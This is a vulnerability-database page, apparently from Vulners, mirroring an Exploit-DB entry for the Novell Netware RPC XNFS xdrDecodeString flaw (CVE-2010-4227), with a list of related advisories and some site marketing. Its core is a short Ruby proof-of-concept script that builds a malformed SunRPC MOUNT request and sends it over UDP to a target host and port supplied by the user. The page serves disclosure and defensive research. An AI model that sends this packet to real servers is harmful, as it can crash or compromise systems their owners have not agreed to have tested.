Lucene search
+L

Novell Netware - RPC XNFS xdrDecodeString

🗓️ 24 Feb 2011 00:00:00Reported by Francis ProvencherType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Novell Netware RPC XNFS xdrDecodeString ruby exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-4227
24 Feb 201100:00
circl
checkpoint_advisories
Check Point Advisories
Novell Netware XNFS.NLM Stack Buffer Overflow (CVE-2010-4227)
7 Jun 201100:00
checkpoint_advisories
cve
CVE
CVE-2010-4227
25 Feb 201118:00
cve
cvelist
Cvelist
CVE-2010-4227
25 Feb 201118:00
cvelist
nvd
NVD
CVE-2010-4227
25 Feb 201119:00
nvd
packetstorm
Packet Storm
Novell Netware RPC XNFS xdrDecodeString Code Execution
24 Feb 201100:00
packetstorm
prion
Prion
Stack overflow
25 Feb 201119:00
prion
securityvulns
securityvulns
ZDI-11-090: Novell Netware RPC XNFS xdrDecodeString Remote Code Execution Vulnerability
24 Feb 201100:00
securityvulns
securityvulns
securityvulns
Novell Netware integer overflow
24 Feb 201100:00
securityvulns
zdi
Zero Day Initiative
Novell Netware RPC XNFS xdrDecodeString Remote Code Execution Vulnerability
18 Feb 201100:00
zdi
Rows per page
#!/usr/bin/ruby

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24

require 'socket'

netware_server = (ARGV[0])
target_port = (ARGV[1] || 1234)


beepbeep=
"\x1c\xd1\xef\xab"  + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa5" + # Program: 10005 MOUNT
"\x00\x00\x00\x02" + # Program Version: 2
"\x00\x00\x00\x01" + # Procedure: MNT  (1)
"\x00\x00\x00\x00\x00\x00\x00\x00" + #
"\x00\x00\x00\x00\x00\x00\x00\x00" + #Verifier NULL
"\x41\x42\x43\x44"




puts "[+] beep beep\n"
puts "[+]No, it's not the road runner\n"


if (!(netware_server && target_port))
    puts "Usage: PRL-2011-04.rb host port (default port: 1234)\n"
    exit
else
    puts "[+]Sending UDP Packet...\n"
    sock = UDPSocket.open
    sock.connect(netware_server, target_port.to_i)
    sock.send(beepbeep, 0)
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Feb 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 210
EPSS0.16819
26